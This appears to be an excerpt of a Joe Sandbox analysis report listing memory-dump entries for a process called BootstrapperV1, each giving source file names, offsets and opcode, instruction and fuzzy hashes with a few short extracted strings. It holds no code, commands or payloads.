• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: \
• API String ID: 0-2967466578
• Opcode ID: 083d42e181f4e1c692bc842cc2a92caada353da545c7f692979ea6fce1a467a6
• Instruction ID: 510bdae1c5c1dd66a90b89273f8b3fa7c4a510f84c8fed5a56debdcddf10dfd1
• Opcode Fuzzy Hash: 083d42e181f4e1c692bc842cc2a92caada353da545c7f692979ea6fce1a467a6
• Instruction Fuzzy Hash: EF9248A0B1CA454FE759AF3CC495A7977D1EF89301F1481BED58EC32A3DD68B8468382
Strings
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: f415f78e59f9d1ec74b9552592bf0464960f9d0a2912d689e64031be3cfb04c1
• Instruction ID: 3ab53765e24cf83d5d713edecdc6ee92259479392458390a3bbbb7bd0097a60d
• Opcode Fuzzy Hash: f415f78e59f9d1ec74b9552592bf0464960f9d0a2912d689e64031be3cfb04c1
• Instruction Fuzzy Hash: 8D2206B161CB868FD759DF38C044AA2BBD1FFA5311F0486BED48A873A2DE64E445C781
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 57f16631ebb2ab63deb1c43508a8cf901df2a07b85c2a7f3021a2ef923eb34f0
• Instruction ID: 94a541ea9787720ffaaf6f43c7f68622b19ee9888d534102c87a996f4bcf6a2a
• Opcode Fuzzy Hash: 57f16631ebb2ab63deb1c43508a8cf901df2a07b85c2a7f3021a2ef923eb34f0
• Instruction Fuzzy Hash: 34527F70A1CA499FDB98EF2CC855AA937E2FFA8345F0541B9E44DD33A1CE64E841C781
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e62d8bc90e784d48805465c5f849467b9805550800c0fc3f45da0d854de2e93a
• Instruction ID: 8b36ab132fa77186595b22d6bececf8fb7aafc07570f954fcce24ad0baf71836
• Opcode Fuzzy Hash: e62d8bc90e784d48805465c5f849467b9805550800c0fc3f45da0d854de2e93a
• Instruction Fuzzy Hash: 15C1A670A1CA4D5FDF95EF2CC445AAA3BE1FF69351B0441BAE54DD33A2CA24E841C781
Strings
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: @J K$PJ K$XL K$d$hL K$xL K
• API String ID: 0-1846992891
• Opcode ID: 8b2a2b643eb362077d6ef700cd49f72329f1d1f08e9b3ddf013e0c4be5782a01
• Instruction ID: 84136d337e351346fd42e570037d84c230fc5d2c2998af7f87877105f74df63a
• Opcode Fuzzy Hash: 8b2a2b643eb362077d6ef700cd49f72329f1d1f08e9b3ddf013e0c4be5782a01
• Instruction Fuzzy Hash: 4FF17BB1A0DB854FD315AF2CD8559757BE0FF92315B0881FEC2898B2A7D964F806C781
Strings
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: Pd K$`d K$hd K$pd K$xd K
• API String ID: 0-558404148
• Opcode ID: 3273af89a565c4f3a7964b8aee3305ffc82ee8b57a1242cf0a9d5c845321b8f5
• Instruction ID: 5e1f724a67a0d03bc2f9fb974c5117b5fdc72d437431dce125128dfe26ae80cb
• Opcode Fuzzy Hash: 3273af89a565c4f3a7964b8aee3305ffc82ee8b57a1242cf0a9d5c845321b8f5
• Instruction Fuzzy Hash: 4E417DD3A0E6C20BE3139E7CEDD65A8BFB0EF5121570C81F6D18887293ED19540B8392
Strings
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID: Pf K$`f K$hf K$pf K
• API String ID: 0-2161957192
• Opcode ID: e1518f8922284b8373b48ee7abc459330d47ce942b2aec5a55e5db0e73ed5d6a
• Instruction ID: 5e7fcce6a4c0cb0c12e193465af4c22d7f9941969545a41caa8ab901574b2b56
• Opcode Fuzzy Hash: e1518f8922284b8373b48ee7abc459330d47ce942b2aec5a55e5db0e73ed5d6a
• Instruction Fuzzy Hash: BB71F6B0A0C6898FDB55EF3CC885AE93BE1FF69305F0541B9E54DC72A2CA64E845C781
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: QM_^
                                                                                                                                                                                                                                              • API String ID: 0-2605159456
                                                                                                                                                                                                                                              • Opcode ID: 6ac97050c20ae0e06e933633884c5caea032390d487251ff2ce29b86e7b7c972
                                                                                                                                                                                                                                              • Instruction ID: 3e0ab24c1fe6b0678d98d340e826e75f7f9a67f45e1990385cb098468da0339d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ac97050c20ae0e06e933633884c5caea032390d487251ff2ce29b86e7b7c972
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48713C72A0D6499BF311BF3CE4455F877A0EF96322F1842BAD18DC71A3DE1864064791
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 4ddb06cb0d59afbbed80f70d7d976ac3a379dce66e04c492a24b3386ca4630fa
                                                                                                                                                                                                                                              • Instruction ID: 134c9611721baa685d46d7027013b37a32a615a4510b1726acb0471316f91d6c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ddb06cb0d59afbbed80f70d7d976ac3a379dce66e04c492a24b3386ca4630fa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E1F2B0A1CB494FD769EF28C844A7577E1FF95301F1445BED18AC72A2DE78E8428B41
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: ab7b2253d829fb06e2eb63f481ed08961d1836737bfdf3028b4d1fc5b4d2915c
                                                                                                                                                                                                                                              • Instruction ID: 317eb9856b68398307a8a66f64954eca673c38eadad74be2f15323ea66771fea
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7b2253d829fb06e2eb63f481ed08961d1836737bfdf3028b4d1fc5b4d2915c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03D132B0A1CB454BD729EF2CD481AB5B3E0FF95315B14857DD28A832A2DA35F8438B81
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 4421f0c734596f2bdfae55205c7599be98671dc8bf91517a1052e3a54e60fea8
                                                                                                                                                                                                                                              • Instruction ID: 435b934d991897ed27b1fe79e3c715c1452d86dfd8c9d00f879f143d136bc21b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4421f0c734596f2bdfae55205c7599be98671dc8bf91517a1052e3a54e60fea8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00C1E1B0A1CB4A4FD769EF28C580575B7E1FF99301B1885BDD18AC72A2DB25F8438781
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: f4d7c1edbdf256508c390963758dfd94e9f6efe8ec63d97626538c6239d14278
                                                                                                                                                                                                                                              • Instruction ID: 7356c7ee5d17c3ade6a56d7fd3e6815b860cdac3292a551ef688d7bc6d4b1b24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4d7c1edbdf256508c390963758dfd94e9f6efe8ec63d97626538c6239d14278
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42C1C0B0A1CB068FD769EE28C481575B3E1FF99301B14857DD58BC36A6DA35F8438781
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                              • API String ID: 0-2564639436
                                                                                                                                                                                                                                              • Opcode ID: 5427a1911f4357ec5409c83b72795ed56771034c7c1ae13d7df8fbb405bf3634
                                                                                                                                                                                                                                              • Instruction ID: 3ad1fb8d35c64af3b40c046ff44ad5896b3f2f72ac0b116847df99f6007d83b2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5427a1911f4357ec5409c83b72795ed56771034c7c1ae13d7df8fbb405bf3634
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91B14670A1CB464BC329EF2CD445AB577E0FF95315B14867ED18AC72A2CA35F8038B81
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: *M_H
                                                                                                                                                                                                                                              • API String ID: 0-3551332076
                                                                                                                                                                                                                                              • Opcode ID: bf6ccc33c3915a7cdefdeb6481ea18b8ff0bdfeccb3c48181df0447ea82bca68
                                                                                                                                                                                                                                              • Instruction ID: a8ff0bde5dbff319c05ae68cecaefd24d73e97ff88cedb70169d4f6dcc41f897
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf6ccc33c3915a7cdefdeb6481ea18b8ff0bdfeccb3c48181df0447ea82bca68
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DB1F9A1B0C98A4FEB85EF7CD4559A97BD2EF99345B0840B9D48DC7293DD68AC028780
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: pL_H
                                                                                                                                                                                                                                              • API String ID: 0-1994359581
                                                                                                                                                                                                                                              • Opcode ID: ee8c1115aa0161e9e5d8f7217d63ac9e0632295323f3722400d2974d9644587b
                                                                                                                                                                                                                                              • Instruction ID: c8980dbe2144a1eb4bd228fa932ad224b2aca7443580c7f7652d1e7d2c49b2d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee8c1115aa0161e9e5d8f7217d63ac9e0632295323f3722400d2974d9644587b
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7a2551a56ac295601e22dc48b0bf38d29d1f2eaa3c7af20339005aab6d1e98cc
                                                                                                                                                                                                                                              • Instruction ID: 9c8cb27660dde354e4b77a3c972240954ee9eef6c0eb880c0d5ea65cbd35d6b8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a2551a56ac295601e22dc48b0bf38d29d1f2eaa3c7af20339005aab6d1e98cc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73D136B1B1C94E4FEB99FE2CC846A7837D1EF95351B0041B9D84EC72A3ED54AC528781
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 56e022e7c7519e8732feda695b147ac3f09ed00ebdbb36b167668026f44c7144
                                                                                                                                                                                                                                              • Instruction ID: 57dfe116fb91fb2aacb86c48a85daae09a1950c6cbc8d70962d28b96b364b8ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e022e7c7519e8732feda695b147ac3f09ed00ebdbb36b167668026f44c7144
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E1C1B0A0D5895FEB59EBB8C4566ADBBE1EF45301F1444FDC08EC76A3EE286846C700
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bb71a05984f71e2b23372ccd7dfac62f8ddddb06b3b10207e812216107d3ee3a
                                                                                                                                                                                                                                              • Instruction ID: 95fc35be6e9264f60a2bb6d7432be02ab282d02cc80688b9f5fdaca4f25433f9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb71a05984f71e2b23372ccd7dfac62f8ddddb06b3b10207e812216107d3ee3a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CC1F7A1B1DA495FEB95EB3CC4596B93BD2EF9925170540FED08EC73A3DD28AC028341
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7d33e4f66378369523f36083aa8772529386f84a0dad6c68e601b8d2d19cc8c7
                                                                                                                                                                                                                                              • Instruction ID: 7779eac1c0bdf1e9cd60ef0ceaa65905749811126b823ca31ae8690d53ceafdf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d33e4f66378369523f36083aa8772529386f84a0dad6c68e601b8d2d19cc8c7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56E153B1D196499FEB99EF2CC8897AC77A1EF58301F0041FAD54DD72A2CE3859828B50
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: e3e13a51ea1b853c4216213a8df754f8140b64daf7b0ec8e62df55327bd33d0a
                                                                                                                                                                                                                                              • Instruction ID: 1c72935eccc6d9980d06c736c38688e9e947a408e949c4bc19d113cf70d42a14
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3e13a51ea1b853c4216213a8df754f8140b64daf7b0ec8e62df55327bd33d0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DC117A1F1C6424AE725BA38C6915BD77D1FF85302F25C1BAC68EC72E2DC9CB8424395
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bcd44b46ed34447e42011afa5880533021bbf6606c734db61dd15d01c24131b1
                                                                                                                                                                                                                                              • Instruction ID: 244f1203d1b693cb32961f23b64a732c9c14ca5e8ae8dd3b2466d70af0ef08d9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcd44b46ed34447e42011afa5880533021bbf6606c734db61dd15d01c24131b1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FC136A1B0DA891FE795EF7CD465AA43FD1EF9A241B0841FED58CC72A3DD649802C340
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: c2c8180721263c0e851b75a503181f8a6dd7ad5d4236ee740000808641f95a09
                                                                                                                                                                                                                                              • Instruction ID: beebe0a0d8aebbc2879f131f89ceeea1189f7d6da53eef7961b719df94d78de7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2c8180721263c0e851b75a503181f8a6dd7ad5d4236ee740000808641f95a09
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5FB1C261A1CE495FEBA5FF38C044AA577D1EF68301B0481FAD84ECB2A7DD29E845C780
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: b6d772f73b6dc30c1c82e017bacc2196c5862e5bdac54615c6c5eaceeb05b777
                                                                                                                                                                                                                                              • Instruction ID: 142b37b4b0525d30b2ff481c52c0f8edd0126bb87b979c7b60ed2d020a4b732e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6d772f73b6dc30c1c82e017bacc2196c5862e5bdac54615c6c5eaceeb05b777
• Instruction Fuzzy Hash: 44A13871B0CA494FEB98EE28C455AB977E1FF99301F0440BDE58DC73A2DE65A846C740
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4d7f43a03eb46d43c46e74e1ce608614e2510243d0877db3aee824c1b507ff02
• Instruction ID: bf03789a303729913699df6b0f58421f02565425157d9d03f9323df10580c576
• Opcode Fuzzy Hash: 4d7f43a03eb46d43c46e74e1ce608614e2510243d0877db3aee824c1b507ff02
• Instruction Fuzzy Hash: EFB1D57060CA4D5FDB98EF2CD495AA97BE2FF69314F0541B9E44DC72A2DE68E802C740
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d6af0a915b5696d02eb795b46d2d73dc7b01d46c6eec60d7a20d677b5b83ab7a
• Instruction ID: a6a11ed9c5ed00c19501c79aff7b4470ffba2d2c357b8c96318535be853d65ac
• Opcode Fuzzy Hash: d6af0a915b5696d02eb795b46d2d73dc7b01d46c6eec60d7a20d677b5b83ab7a
• Instruction Fuzzy Hash: 1E812B92B1CE0E0FF7D8EA7CE85967577C2EF98652B1442BAD44DC33A6DC19AC424381
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c5244567592d71b9afaa855d22ca5f5065a27c4c172e5f58964513756cd2b9f
• Instruction ID: ef36250195be8b83da254e9e59c29368af63dc8fec48b484b40395edfb5017c9
• Opcode Fuzzy Hash: 0c5244567592d71b9afaa855d22ca5f5065a27c4c172e5f58964513756cd2b9f
• Instruction Fuzzy Hash: 239169A290EBC91FE7479B7898751A57FB0AF0724170D41EBC4C8CF2A7D91CA80AC352
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe760e85c2137f67c9925999a1d296217fce50eb5a6dea726aa8d0277860e8e1
• Instruction ID: 3b3fbfd573f4b39ba3e51961f85bfff3e1261e7d02b8a72d53cc297d83ae703c
• Opcode Fuzzy Hash: fe760e85c2137f67c9925999a1d296217fce50eb5a6dea726aa8d0277860e8e1
• Instruction Fuzzy Hash: 7781256171CD091FE6A9BA2CE8597B937C1EF89322B0541FAE44DC73A6DD19AC428381
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e65f2a417cbcf8cfdd855b72aa291304bd4fd5855de5a41d04a30b6444df4a53
• Instruction ID: 327e81ee3f56f7cd7ed7dd5b10b31502bb0033574f397016091f2ceaca03441b
• Opcode Fuzzy Hash: e65f2a417cbcf8cfdd855b72aa291304bd4fd5855de5a41d04a30b6444df4a53
• Instruction Fuzzy Hash: 1F9107B1A0CA8E8FDB85EF7CC495AED7BE1FF59311B0441BAD54DD7292DE24A8018780
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: caf90d10ac86ec657284c91822cca5eabdcb9bb0014652297daaf1ae48a4e141
• Instruction ID: fe9e1d5cc4ed080056c34ad4e824702f22f83cd58a351a2220ec800dd1836383
• Opcode Fuzzy Hash: caf90d10ac86ec657284c91822cca5eabdcb9bb0014652297daaf1ae48a4e141
• Instruction Fuzzy Hash: 6C81257160DB4A4FE355EF2CD84597077E0EF96321B1882BED18DC72A3D969A843CB41
Memory Dump Source
• Source File: 00000003.00000002.1719265302.00007FFB4B0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B0E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4b0e0000_BootstrapperV1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 258f36a7e82a9d7db5a855123d367dbca95d8e8a08e79924c16e2409a6991fdf
• Instruction ID: c9cd56f57c7498731d4d4cce7f8bd4311669829364c2f274efdb0ccd4c74b78e
• Opcode Fuzzy Hash: 258f36a7e82a9d7db5a855123d367dbca95d8e8a08e79924c16e2409a6991fdf
• Instruction Fuzzy Hash: A181EA71A0CA585FDB59EF6CD8955A97BE0FFA8711B04017FE54AC7361DD20A802C7C2
Memory Dump Source
